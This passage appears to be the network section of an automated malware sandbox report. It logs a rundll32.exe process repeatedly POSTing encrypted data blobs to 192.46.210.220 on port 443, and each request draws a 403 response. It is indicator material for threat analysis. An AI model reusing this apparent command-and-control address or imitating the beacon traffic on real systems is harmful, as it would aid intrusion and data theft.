2021-10-28 03:28:16 UTC	301	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:17 UTC	306	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:17 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.3	50064	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:19 UTC	306	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:19 UTC	306	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:20 UTC	311	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.3	50066	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:20 UTC	311	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:20 UTC	311	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:21 UTC	316	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:21 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.3	50072	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:30 UTC	316	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:30 UTC	316	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:31 UTC	321	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:31 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.3	50074	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:31 UTC	321	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:31 UTC	321	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:32 UTC	326	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:32 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.3	50080	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:34 UTC	326	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:34 UTC	326	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:35 UTC	331	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:35 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.3	50082	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:35 UTC	331	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:35 UTC	331	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:36 UTC	335	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:36 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.3	50088	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:38 UTC	336	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:38 UTC	336	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:39 UTC	340	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:39 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.3	50090	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:39 UTC	341	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:39 UTC	341	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:40 UTC	345	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49773	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:27 UTC	34	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:27 UTC	34	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:28 UTC	39	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:28 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.3	50096	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:42 UTC	345	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:42 UTC	346	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:43 UTC	350	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:43 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.3	50098	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:43 UTC	350	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:43 UTC	351	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:44 UTC	355	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.3	50104	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:46 UTC	355	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:46 UTC	355	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:47 UTC	360	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.3	50106	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:47 UTC	360	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:47 UTC	360	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:28:48 UTC	365	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:28:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.3	50112	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:28:50 UTC	365	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:28:50 UTC	365	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 